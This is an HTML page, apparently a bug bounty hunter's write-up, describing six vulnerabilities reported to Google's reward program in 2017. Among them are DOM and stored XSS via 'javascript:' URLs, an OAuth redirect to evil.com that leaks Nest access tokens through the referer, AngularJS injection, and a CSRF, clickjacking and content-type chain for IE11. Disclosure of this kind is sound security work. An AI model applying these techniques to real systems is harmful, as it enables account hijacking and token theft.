-
Notifications
You must be signed in to change notification settings - Fork 0
/
googlebugs.html
151 lines (136 loc) · 9.45 KB
/
googlebugs.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
<div style=" padding-top: 20px;
padding-right: 240px;
padding-bottom: 50px;
padding-left: 240px;">
<p style="font-size: 300%">Google bugs stories and the shiny pixelbook.</p>
<font size="5" color="black">
<p>Peace upon you hunters, hope y'all doing good, My gift from google security team has landed today,
Here I am sharing the bugs that got it for me, along the past year (2017) which also ranked me at 7
onto google HOF, anyway, there is nothing special about them, but folks wanted to see them.
</font>
<blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">appreciation have always
had its own Words. Thanks guys <a href="https://twitter.com/sirdarckcat?ref_src=twsrc%5Etfw">@sirdarckcat</a>
<a href="https://t.co/jm2aUTMMvQ">pic.twitter.com/jm2aUTMMvQ</a></p>— Missoum Said (@missoum1307)
<a href="https://twitter.com/missoum1307/status/965675733694722048?ref_src=twsrc%5Etfw">February 19, 2018</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></font></p>
<p>
<font size="8" color="black">
1) google.com/adsense/ DOM XSS: </br></font>
<font size="5" color="black">
i was rediscovering the app,I usually do that with google VRP, <mark>they push updates and new
designs from time to time</mark>, and I had just noticed this url
<a href=https://www.google.com/adsense/new/u/pub-444/home?host-callback-url=domain.com>
https://www.google.com/adsense/new/u/pub-444/home?host-callback-url=domain.com</a>
loading, nobody would have missed it, 100 percent of hunters would try their bullet
in host-callback-url paramter, so did I, and got the XSS fired .</br>
full XSS url was as follow : https://www.google.com/adsense/new/u/pub-444/home?host-callback-url=javascript:alert(0)
</br><iframe width="560" height="315" src="https://www.youtube.com/embed/PH3J2DXDYZM" frameborder="0" allow="autoplay;
encrypted-media" allowfullscreen></iframe>
</font></p>
<p>
<font size="8" color="black">
2) business.google.com Stored XSS: </br></font>
<font size="5" color="black">
if you ever hunted in business.google.com then you have seen that they got an option
for editing the website of your business location, what you'll be sure of website editing is
always ability to inject at least tags like <xmp> <a> <img> </xmp>, and once again, from the editing area click the
link button then add your bullet 'javascript:alert(1)', somewhow clicking normally on the the generated
link was not firing the XSS, <mark>CTRL or Shift + click was needed to fire the XSS.</mark></br>
<iframe width="560" height="315" src="https://www.youtube.com/embed/gDOYPFV8nyM"
frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
</font></p>
<p>
<font size="8" color="black">
3)changing your home temperature through leaking your nest access token in referer:</br></font>
<font size="5" color="black">
one day i was checking my phone (android device),seen that they wanted to push an update which was the google assistant
with her lovely voice lol, after the the assistant installed I ran burpsuite up and start looking around the app and i was
lucky that there were too much things to play with.</br>
in google assistant you can control your smart home devices by linking third parties (the ones that control your smart
home's devices), what cought my attention in there is "nest" app, as its owned
by google and other are just third parties and wont be rewarded,
the attack flow was as follow: </br>
<ul>
<li>I: providing the victim with assistant.google.com/services/adapters/nest/activate?activateuid=54zae465az-54aze54a&redirect_url=evil.Com
which has an evil redirecting</li>
</br>
<li>II: victim login to try to give the authirzation to google and click accept after log in to his nest account. </li>
<li>III: google authorization app was not checking the redirecting hence the victim's access token was leaking in referer.</li>
</ul>
the redireting was coming back through <xmp><meta http-equiv="refresh" content="0;URL='evil.com'" /> </xmp>
you'd have been able to XSS the matter before few years ago, as most browsers now refusing to refresh to a javascript: URL.</br></br>
<img src=https://i.imgur.com/urzAIDu.png height=200 width=200></br></br>
anyway, this XSS wasnt rewarded because it works only on older browsers but leaking the nest access token was, <mark> sometimes having google products/devices gives you advantges.</mark></br>
<iframe width="560" height="315" src="https://www.youtube.com/embed/L8ySb-dPBW8" frameborder="0" allow="autoplay; encrypted-media"
allowfullscreen></iframe>
</font></p>
<p>
<font size="8" color="black">
4) google Local Guides Stored XSS via AngularJS Injection:</br></font>
<font size="5" color="black">
if you used to share reviews, photos, about the places in google maps then you are familiar with google Local Guides product, at some
certain level, google will offer you to create a meetup, creating the meetup with angularjs exprestion in name of the meetup
was stored and exectued back.
<mark>contribute whenever you can with google.</mark>
</font></p>
<p>
<font size="8" color="black">
5) google maps reflected XSS:</br></font>
<font size="5" color="black">
this one was also related to google Local Guides but diffrent root, like every hunter, I have multiple google accounts, at one point,
I was trying to access a url from account with creating meetup privilege with account without that privilege and then something interesting show up on
screen. a url with paramter and value, i didnt use to see, espcially when you are familiar with google vrp.
the value was reflected back nacked , i mean without sanitizing special characters. so the vulnerable url was something like :
google.com/maps/apis/authen?par=XSS-goes-here.
I forgot to take any screenshots or record the POC, and deleted the report email. beside my account in google local guide has
blocked by a google staff.
lesson learn here is,<mark> always check apps,links,features with low preveillge account espcilally with Google VRP,</mark> you got no
idea what'll show up.
</font></p>
<p>
<font size="8" color="black">
6) explorer.earthengine.google.com reflected XSS IE only:</br></font>
<font size="5" color="black">
this XSS's found after reading <blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">Combination of
techniques lead to <a href="https://twitter.com/hashtag/DOM?src=hash&ref_src=twsrc%5Etfw">#DOM</a> Based
<a href="https://twitter.com/hashtag/XSS?src=hash&ref_src=twsrc%5Etfw">#XSS</a> in
<a href="https://twitter.com/hashtag/Google?src=hash&ref_src=twsrc%5Etfw">#Google</a>.
<a href="https://t.co/tqt3nbRNJX">https://t.co/tqt3nbRNJX</a><a href="https://twitter.com/hashtag/VRP?src=hash&ref_src=twsrc%5Etfw">
#VRP</a>
<a href="https://twitter.com/hashtag/XSS?src=hash&ref_src=twsrc%5Etfw">#XSS</a>
<a href="https://twitter.com/hashtag/Google?src=hash&ref_src=twsrc%5Etfw">#Google</a>
//cc:<a href="https://twitter.com/sirdarckcat?ref_src=twsrc%5Etfw">@sirdarckcat</a></p>— Sasi Levi 🎧 (@sasi2103)
<a href="https://twitter.com/sasi2103/status/777793598268043264?ref_src=twsrc%5Etfw">September 19, 2016</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
google earthengine is a planetary-scale platform for Earth science data & analysis, decided to take a look, felt
it vulnerable and my perspective was correct,
when it comes to data, the appalication should be having something like uploading or downloading data, examining
the appliaction revealed feature to add data layer from Fusion Table. </br>
i would mention here that this feature was available in some accounts and was not in some accounts, honestly till now i dont
know why!
uploading the data, showed that the table name stored and without sanitazing but wait, the response was appliaction/json ,
checking the http headers also showed there was neither x-frame-options nor x-content-type-options, as some of you learn that i am
telling the perfect conditions to get an xss on IE 11 by forcing the content-type to be text/html .
<mark><a href=https://twitter.com/cure53berlin>@cure53berlin's </a>resaerch</mark> shows a trick how to do that.</br> their research is a treasure i highly recommend reading
it carefully.</br>
this was a self-stored XSS till i discovered that the adding the data was lacking the CSRF protection,combining thse minor issues:</br>
<ul>
<li>force application/json response to be text/html</li>
<li>attacker has control over input within it ( < > is not sanitized )</li>
<li>vulnerable to clickjacking. </li>
<li>csrf to store the XSS in victim account. </li>
</ul>
i could XSS the victim account, sometimes bugs are looking for ya .</br>
<iframe width="560" height="315" src="https://www.youtube.com/embed/Qy_Ndkd86rg" frameborder="0" allow="autoplay; encrypted-media"
allowfullscreen></iframe>
</font></p>
<p>
<font size="5" color="black">
these bugs were all i could collect, still there two or three high-bounty bugs but i couldnt find them, i hope you didnt get bored
reading it. i highlighted some advices that helps you with google vrp, i would like to thank google security team,especially
<a href=https://twitter.com/sirdarckcat>@sirdarckcat</a> this guy is a strong bridge between hunters and google vrp, just leave us a comment if you feel to at
<a href=https://twitter.com/missoum1307> @missoum1307
</a></br> peace upon you.
</font>
</p>
</div>